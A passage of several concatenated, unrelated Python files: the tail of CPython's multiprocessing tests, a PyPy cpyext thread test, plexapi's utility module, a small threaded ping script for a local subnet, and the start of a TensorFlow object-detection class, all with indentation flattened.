gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
test_thread.py
|
import sys
import pytest
from pypy.module.cpyext.test.test_cpyext import AppTestCpythonExtensionBase
only_pypy ="config.option.runappdirect and '__pypy__' not in sys.builtin_module_names"
class AppTestThread(AppTestCpythonExtensionBase):
@pytest.mark.skipif(only_pypy, reason='pypy only test')
def test_get_thread_ident(self):
module = self.import_extension('foo', [
("get_thread_ident", "METH_NOARGS",
"""
#ifndef PyThread_get_thread_ident
#error "seems we are not accessing PyPy's functions"
#endif
return PyInt_FromLong(PyThread_get_thread_ident());
"""),
])
import thread, threading
results = []
def some_thread():
res = module.get_thread_ident()
results.append((res, thread.get_ident()))
some_thread()
assert results[0][0] == results[0][1]
th = threading.Thread(target=some_thread, args=())
th.start()
th.join()
assert results[1][0] == results[1][1]
assert results[0][0] != results[1][0]
@pytest.mark.skipif(only_pypy, reason='pypy only test')
def test_acquire_lock(self):
module = self.import_extension('foo', [
("test_acquire_lock", "METH_NOARGS",
"""
#ifndef PyThread_allocate_lock
#error "seems we are not accessing PyPy's functions"
#endif
PyThread_type_lock lock = PyThread_allocate_lock();
if (PyThread_acquire_lock(lock, 1) != 1) {
PyErr_SetString(PyExc_AssertionError, "first acquire");
return NULL;
}
if (PyThread_acquire_lock(lock, 0) != 0) {
PyErr_SetString(PyExc_AssertionError, "second acquire");
return NULL;
}
PyThread_free_lock(lock);
Py_RETURN_NONE;
"""),
])
module.test_acquire_lock()
@pytest.mark.skipif(only_pypy, reason='pypy only test')
def test_release_lock(self):
module = self.import_extension('foo', [
("test_release_lock", "METH_NOARGS",
"""
#ifndef PyThread_release_lock
#error "seems we are not accessing PyPy's functions"
#endif
PyThread_type_lock lock = PyThread_allocate_lock();
PyThread_acquire_lock(lock, 1);
PyThread_release_lock(lock);
if (PyThread_acquire_lock(lock, 0) != 1) {
PyErr_SetString(PyExc_AssertionError, "first acquire");
return NULL;
}
PyThread_free_lock(lock);
Py_RETURN_NONE;
"""),
])
module.test_release_lock()
@pytest.mark.skipif(only_pypy, reason='pypy only test')
def test_tls(self):
module = self.import_extension('foo', [
("create_key", "METH_NOARGS",
"""
return PyInt_FromLong(PyThread_create_key());
"""),
("test_key", "METH_O",
"""
int key = PyInt_AsLong(args);
if (PyThread_get_key_value(key) != NULL) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
if (PyThread_set_key_value(key, (void*)123) < 0) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
if (PyThread_get_key_value(key) != (void*)123) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
Py_RETURN_NONE;
"""),
])
key = module.create_key()
assert key > 0
# Test value in main thread.
module.test_key(key)
raises(ValueError, module.test_key, key)
# Same test, in another thread.
result = []
import thread, time
def in_thread():
try:
module.test_key(key)
raises(ValueError, module.test_key, key)
except Exception as e:
result.append(e)
else:
result.append(True)
thread.start_new_thread(in_thread, ())
while not result:
print "."
time.sleep(.5)
assert result == [True]
|
utils.py
|
# -*- coding: utf-8 -*-
import logging
import os
import re
import requests
import time
import zipfile
from datetime import datetime
from getpass import getpass
from threading import Thread, Event
from tqdm import tqdm
from plexapi import compat
from plexapi.exceptions import NotFound
# Search Types - Plex uses these to filter specific media types when searching.
# Library Types - Populated at runtime
SEARCHTYPES = {'movie': 1, 'show': 2, 'season': 3, 'episode': 4, 'trailer': 5, 'comic': 6, 'person': 7,
'artist': 8, 'album': 9, 'track': 10, 'picture': 11, 'clip': 12, 'photo': 13, 'photoalbum': 14,
'playlist': 15, 'playlistFolder': 16, 'collection': 18, 'userPlaylistItem': 1001}
PLEXOBJECTS = {}
class SecretsFilter(logging.Filter):
""" Logging filter to hide secrets. """
def __init__(self, secrets=None):
self.secrets = secrets or set()
def add_secret(self, secret):
if secret is not None:
self.secrets.add(secret)
return secret
def filter(self, record):
cleanargs = list(record.args)
for i in range(len(cleanargs)):
if isinstance(cleanargs[i], compat.string_type):
for secret in self.secrets:
cleanargs[i] = cleanargs[i].replace(secret, '<hidden>')
record.args = tuple(cleanargs)
return True
def registerPlexObject(cls):
""" Registry of library types we may come across when parsing XML. This allows us to
define a few helper functions to dynamically convery the XML into objects. See
buildItem() below for an example.
"""
etype = getattr(cls, 'STREAMTYPE', cls.TYPE)
ehash = '%s.%s' % (cls.TAG, etype) if etype else cls.TAG
if ehash in PLEXOBJECTS:
raise Exception('Ambiguous PlexObject definition %s(tag=%s, type=%s) with %s' %
(cls.__name__, cls.TAG, etype, PLEXOBJECTS[ehash].__name__))
PLEXOBJECTS[ehash] = cls
return cls
def cast(func, value):
""" Cast the specified value to the specified type (returned by func). Currently this
only support int, float, bool. Should be extended if needed.
Parameters:
func (func): Calback function to used cast to type (int, bool, float).
value (any): value to be cast and returned.
"""
if value is not None:
if func == bool:
return bool(int(value))
elif func in (int, float):
try:
return func(value)
except ValueError:
return float('nan')
return func(value)
return value
def joinArgs(args):
""" Returns a query string (uses for HTTP URLs) where only the value is URL encoded.
Example return value: '?genre=action&type=1337'.
Parameters:
args (dict): Arguments to include in query string.
"""
if not args:
return ''
arglist = []
for key in sorted(args, key=lambda x: x.lower()):
value = compat.ustr(args[key])
arglist.append('%s=%s' % (key, compat.quote(value)))
return '?%s' % '&'.join(arglist)
def lowerFirst(s):
return s[0].lower() + s[1:]
def rget(obj, attrstr, default=None, delim='.'): # pragma: no cover
""" Returns the value at the specified attrstr location within a nexted tree of
dicts, lists, tuples, functions, classes, etc. The lookup is done recursivley
for each key in attrstr (split by by the delimiter) This function is heavily
influenced by the lookups used in Django templates.
Parameters:
obj (any): Object to start the lookup in (dict, obj, list, tuple, etc).
attrstr (str): String to lookup (ex: 'foo.bar.baz.value')
default (any): Default value to return if not found.
delim (str): Delimiter separating keys in attrstr.
"""
try:
parts = attrstr.split(delim, 1)
attr = parts[0]
attrstr = parts[1] if len(parts) == 2 else None
if isinstance(obj, dict):
value = obj[attr]
elif isinstance(obj, list):
value = obj[int(attr)]
elif isinstance(obj, tuple):
value = obj[int(attr)]
elif isinstance(obj, object):
value = getattr(obj, attr)
if attrstr:
return rget(value, attrstr, default, delim)
return value
except: # noqa: E722
return default
def searchType(libtype):
""" Returns the integer value of the library string type.
Parameters:
libtype (str): LibType to lookup (movie, show, season, episode, artist, album, track,
collection)
Raises:
:class:`plexapi.exceptions.NotFound`: Unknown libtype
"""
libtype = compat.ustr(libtype)
if libtype in [compat.ustr(v) for v in SEARCHTYPES.values()]:
return libtype
if SEARCHTYPES.get(libtype) is not None:
return SEARCHTYPES[libtype]
raise NotFound('Unknown libtype: %s' % libtype)
def threaded(callback, listargs):
""" Returns the result of <callback> for each set of \*args in listargs. Each call
to <callback> is called concurrently in their own separate threads.
Parameters:
callback (func): Callback function to apply to each set of \*args.
listargs (list): List of lists; \*args to pass each thread.
"""
threads, results = [], []
job_is_done_event = Event()
for args in listargs:
args += [results, len(results)]
results.append(None)
threads.append(Thread(target=callback, args=args, kwargs=dict(job_is_done_event=job_is_done_event)))
threads[-1].setDaemon(True)
threads[-1].start()
while not job_is_done_event.is_set():
if all([not t.is_alive() for t in threads]):
break
time.sleep(0.05)
return [r for r in results if r is not None]
def toDatetime(value, format=None):
""" Returns a datetime object from the specified value.
Parameters:
value (str): value to return as a datetime
format (str): Format to pass strftime (optional; if value is a str).
"""
if value and value is not None:
if format:
value = datetime.strptime(value, format)
else:
# https://bugs.python.org/issue30684
# And platform support for before epoch seems to be flaky.
# TODO check for others errors too.
if int(value) == 0:
value = 86400
value = datetime.fromtimestamp(int(value))
return value
def toList(value, itemcast=None, delim=','):
""" Returns a list of strings from the specified value.
Parameters:
value (str): comma delimited string to convert to list.
itemcast (func): Function to cast each list item to (default str).
delim (str): string delimiter (optional; default ',').
"""
value = value or ''
itemcast = itemcast or str
return [itemcast(item) for item in value.split(delim) if item != '']
def downloadSessionImages(server, filename=None, height=150, width=150,
opacity=100, saturation=100): # pragma: no cover
""" Helper to download a bif image or thumb.url from plex.server.sessions.
Parameters:
filename (str): default to None,
height (int): Height of the image.
width (int): width of the image.
opacity (int): Opacity of the resulting image (possibly deprecated).
saturation (int): Saturating of the resulting image.
Returns:
{'hellowlol': {'filepath': '<filepath>', 'url': 'http://<url>'},
{'<username>': {filepath, url}}, ...
"""
info = {}
for media in server.sessions():
url = None
for part in media.iterParts():
if media.thumb:
url = media.thumb
if part.indexes: # always use bif images if available.
url = '/library/parts/%s/indexes/%s/%s' % (part.id, part.indexes.lower(), media.viewOffset)
if url:
if filename is None:
prettyname = media._prettyfilename()
filename = 'session_transcode_%s_%s_%s' % (media.usernames[0], prettyname, int(time.time()))
url = server.transcodeImage(url, height, width, opacity, saturation)
filepath = download(url, filename=filename)
info['username'] = {'filepath': filepath, 'url': url}
return info
def download(url, token, filename=None, savepath=None, session=None, chunksize=4024,
unpack=False, mocked=False, showstatus=False):
""" Helper to download a thumb, videofile or other media item. Returns the local
path to the downloaded file.
Parameters:
url (str): URL where the content be reached.
token (str): Plex auth token to include in headers.
filename (str): Filename of the downloaded file, default None.
savepath (str): Defaults to current working dir.
chunksize (int): What chunksize read/write at the time.
mocked (bool): Helper to do evertything except write the file.
unpack (bool): Unpack the zip file.
showstatus(bool): Display a progressbar.
Example:
>>> download(a_episode.getStreamURL(), a_episode.location)
/path/to/file
"""
from plexapi import log
# fetch the data to be saved
session = session or requests.Session()
headers = {'X-Plex-Token': token}
response = session.get(url, headers=headers, stream=True)
# make sure the savepath directory exists
savepath = savepath or os.getcwd()
compat.makedirs(savepath, exist_ok=True)
# try getting filename from header if not specified in arguments (used for logs, db)
if not filename and response.headers.get('Content-Disposition'):
filename = re.findall(r'filename=\"(.+)\"', response.headers.get('Content-Disposition'))
filename = filename[0] if filename[0] else None
filename = os.path.basename(filename)
fullpath = os.path.join(savepath, filename)
# append file.ext from content-type if not already there
extension = os.path.splitext(fullpath)[-1]
if not extension:
contenttype = response.headers.get('content-type')
if contenttype and 'image' in contenttype:
fullpath += contenttype.split('/')[1]
# check this is a mocked download (testing)
if mocked:
log.debug('Mocked download %s', fullpath)
return fullpath
# save the file to disk
log.info('Downloading: %s', fullpath)
if showstatus: # pragma: no cover
total = int(response.headers.get('content-length', 0))
bar = tqdm(unit='B', unit_scale=True, total=total, desc=filename)
with open(fullpath, 'wb') as handle:
for chunk in response.iter_content(chunk_size=chunksize):
handle.write(chunk)
if showstatus:
bar.update(len(chunk))
if showstatus: # pragma: no cover
bar.close()
# check we want to unzip the contents
if fullpath.endswith('zip') and unpack:
with zipfile.ZipFile(fullpath, 'r') as handle:
handle.extractall(savepath)
return fullpath
def tag_helper(tag, items, locked=True, remove=False):
""" Simple tag helper for editing a object. """
if not isinstance(items, list):
items = [items]
data = {}
if not remove:
for i, item in enumerate(items):
tagname = '%s[%s].tag.tag' % (tag, i)
data[tagname] = item
if remove:
tagname = '%s[].tag.tag-' % tag
data[tagname] = ','.join(items)
data['%s.locked' % tag] = 1 if locked else 0
return data
def getMyPlexAccount(opts=None): # pragma: no cover
""" Helper function tries to get a MyPlex Account instance by checking
the the following locations for a username and password. This is
useful to create user-friendly command line tools.
1. command-line options (opts).
2. environment variables and config.ini
3. Prompt on the command line.
"""
from plexapi import CONFIG
from plexapi.myplex import MyPlexAccount
# 1. Check command-line options
if opts and opts.username and opts.password:
print('Authenticating with Plex.tv as %s..' % opts.username)
return MyPlexAccount(opts.username, opts.password)
# 2. Check Plexconfig (environment variables and config.ini)
config_username = CONFIG.get('auth.myplex_username')
config_password = CONFIG.get('auth.myplex_password')
if config_username and config_password:
print('Authenticating with Plex.tv as %s..' % config_username)
return MyPlexAccount(config_username, config_password)
# 3. Prompt for username and password on the command line
username = input('What is your plex.tv username: ')
password = getpass('What is your plex.tv password: ')
print('Authenticating with Plex.tv as %s..' % username)
return MyPlexAccount(username, password)
def choose(msg, items, attr): # pragma: no cover
""" Command line helper to display a list of choices, asking the
user to choose one of the options.
"""
# Return the first item if there is only one choice
if len(items) == 1:
return items[0]
# Print all choices to the command line
print()
for index, i in enumerate(items):
name = attr(i) if callable(attr) else getattr(i, attr)
print(' %s: %s' % (index, name))
print()
# Request choice from the user
while True:
try:
inp = input('%s: ' % msg)
if any(s in inp for s in (':', '::', '-')):
idx = slice(*map(lambda x: int(x.strip()) if x.strip() else None, inp.split(':')))
return items[idx]
else:
return items[int(inp)]
except (ValueError, IndexError):
pass
|
ping1_basic.py
|
#! /usr/bin/env python3
# -*-coding:utf-8 -*-
# @Time : 2019/06/16 16:45:29
# @Author : che
# @Email : ch1huizong@gmail.com
from threading import Thread
import subprocess
from queue import Queue
num_threads = 3
queue = Queue()
ips = ["192.168.1.%d" % ip for ip in range(1, 255)]
def pinger(i, q): # 实际工作
while True:
ip = q.get()
print("Thread %s: Pinging %s" % (i, ip))
ret = subprocess.call(
"ping -c1 %s " % ip,
shell=True,
stdout=open("/dev/null", "w"), # 禁用输出
stderr=subprocess.STDOUT,
)
if ret == 0:
print("%s: is alive" % ip)
else:
print("%s: did not respond" % ip)
q.task_done() # 完成一个任务
def main():
for i in range(num_threads):
worker = Thread(target=pinger, args=(i, queue))
worker.setDaemon(True)
worker.start()
# 向队列添加任务
for ip in ips:
queue.put(ip)
print("Main Thread Waiting")
queue.join() # 主线程阻塞,等待队列处理完毕
print("Done")
# 注意,线程之间的切换调度是操作系统管理的
main()
|
detection.py
|
'''
COPYRIGHT @ Grebtsew 2019
A simple object detection implementation
'''
import sys
sys.path.insert(0,'..')
import tensorflow as tf
from utils import label_map_util
import numpy as np
from threading import Thread
import os
import screen_overlay_handler
class Obj_Detection(Thread):
result = None
MODEL_NAME = 'ssd_mobilenet_v1_coco_11_06_2017'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = '../models/' + MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
CWD_PATH = os.path.dirname(os.getcwd())
PATH_TO_LABELS = os.path.join(CWD_PATH,'object_detection', 'data', 'mscoco_label_map.pbtxt')
NUM_CLASSES = 90
def __init__(self ):
Thread.__init__(self)
self.detection_graph = self.load_model()
#self.shared_variables.categorylist = categories
#self.shared_variables.category_max = self.NUM_CLASSES
#self.shared_variables.category_index = category_index
self.sess = tf.Session(graph=self.detection_graph)
print("Model successfully loaded! Detection Active!")
def load_model(self):
# Load model
print("Loading model")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(self.PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return detection_graph
def run_async(self):
thread = Thread(target=self.run).start()
def get_result(self):
# Deadlock warnings here but we will always only use one detection per frame so should be fine
while self.result is None:
pass
return self.result
def run(self):
if self.frame is not None:
image_np = self.frame
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = self.detection_graph.get_tensor_by_name('detection_scores:0')
classes = self.detection_graph.get_tensor_by_name('detection_classes:0')
